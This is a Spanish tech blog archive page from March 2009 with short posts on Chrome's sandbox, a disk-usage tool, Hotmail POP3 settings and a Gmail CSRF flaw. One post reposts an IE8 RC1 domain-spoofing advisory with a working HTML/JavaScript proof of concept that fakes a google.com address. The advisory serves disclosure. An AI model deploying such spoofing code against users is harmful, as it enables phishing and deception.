Archivo para 31 marzo 2009

Super Mario Bros en la vida real

Google Chrome es demasiado difícil de hackear

chrome-crash

La virtud de los navegadores multiproceso esque al estar cada uno de los procesos aislados entre sí, no pueden afectarse los unos a los otros.

En el caso de Google Chrome se le añade, además, el hecho de que se ejecuten dentro de una sandbox, un entorno en el cual no tienen acceso a recursos externos y, por tanto, los problemas de seguridad no afectarán al resto de la máquina. Y esto ha quedado demostrado en el PWN2OWN.
Seguir leyendo ‘Google Chrome es demasiado difícil de hackear’

Check Your Disk! te indica qué es lo que está ocupando más espacio en el disco duro

checkyourdisk-300x227

Check Your Disk! es una herramienta para Windows que puede analizar tu disco duro e informarte cómo está conformada la distribución de datos, para que puedas tener una idea de cuáles son las cosas que más espacio están ocupando.

La aplicación nos permite visualizar gráficamente cómo está ocupado el disco duro. Como podemos ver en la imagen que acompaña el artículo, se nos muestra un gráfico de torta separado por colores. En él encontraremos las carpetas que más información contienen.

Como usuario puedes analizar el disco duro completo o solamente alguna locación en especial, como por ejemplo Mis Documentos, Mi Música, u otras. Al hacer clic sobre alguna porción de la torta obtendrás más información, como por ejemplo cuales son los archivos que más espacio ocupan.

Check Your Disk! es una herramienta para Windows totalmente gratuita que no requiere instalación alguna. Sólo ejecuta el archivo .EXE y podrás obtener rápidamente un reporte de tu disco duro.

Enlace: Check Your Disk!

Vía: Bitelia.

Hotmail habilita el acceso POP3 desde cualquier parte del mundo

hotmail Si recuerdan, en enero les comentábamos que Hotmail había habilitado el soporte POP3 para poder hacer consulta de tus correos desde cualquier cliente, sin embargo esto estaba limitado a Estados Unidos y algunos otros países. Hoy el equipo de Windows Live da el anuncio de que esta característica está disponible para todo el mundo.

Para que tu cliente reciba los mails de Hotmail es necesario que configures tu nueva cuenta con los siguientes datos:

POP server: pop3.live.com (Port 995)
¿POP SSL requerido?
User name: Tu Windows Live ID, por ejemplo tunombre@hotmail.com
Password: La contraseña que usas para entrar a Hotmail o Windows Live
SMTP server: smtp.live.com (Port 25)
¿Servidor requiere autenticación?
¿TLS/SSL requerido?

Así que aquellos que usan Hotmail de ahora en adelante podrán sentirse liberados de tener que entrar al sitio de Hotmail para revisar sus mails. Por cierto, como dato curioso e irónico, he instalado el correo en mi cuenta de Gmail y funciona de maravilla.

Vía: Bitelia.

IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoofing

###########################################

IE8 beta RC1 res: / / Ieframe.dll / acr_error.htm Spoff
Vendedor: http://www.microsoft.com
Avisado por: http://lostmon.blogspot.com/2009/03/ie8-beta-c1-resieframedllacrerrorhtm.html
Notificado al vendedor: Disponibilidad del exploit:

############################################

Internet Explorer 8 tiene una vulnerabilidad que permite a los usuarios remotos spoofear el nombre del dominio en ‘Ieframe.dll‘ que se establece en el archivo ‘acr_error.htm‘ en res: URI es desde donde maneja cualquier usuario remoto pudiendo así crear una URL maligna que muestra el nombre de dominio, por ejemplo, “google.com“, (pero si clickamos en la url de google nos lleva a otros sítios, es lo llamado spoofing)

#################

Prueba del concepto

#################

<html>

<head>

<script type=”text/javascript”>

function open_win()

{

window.open(“res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com”,”_blank”,”toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no”);

}

</script>

</head>

<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>

<body>

<form>

<input type=”button” value=”Open Window” onclick=”open_win()”>

</form>

</body>

</html>

#######################################

Thnx To estrella to be my ligth

Thnx to all Lostmon Team.

atentamente:

Lostmon (lostmon@gmail.com)

—————

thz Lost 😉

Vulnerabilidad en GMail permite cambiar la contraseña de acceso sin permiso alguno

gmail Ni es la primera de este tipo ni tampoco me atrevo a llamarla nueva, porque al parecer Google fue informado en Agosto de 2007 de esta vulnerabilidad, que no ha solucionado porque le parece difícilmente explotable. El descubridor es un español (Vicente Aguilera, de ISecAuditors) que ha decidido publicar una descripción y prueba de concepto. Se trata de una vulnerabilidad del tipo CSRF, que permitiría a un atacante cambiar la contraseña de un usuario de Gmail sin su conocimiento.

http://seclists.org/fulldisclosure/2009/Mar/0029.html

Vía: menéame.


Blog Stats

  • 612,371 visitas

RSS

Feed
marzo 2009
L M X J V S D
« Feb   Abr »
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker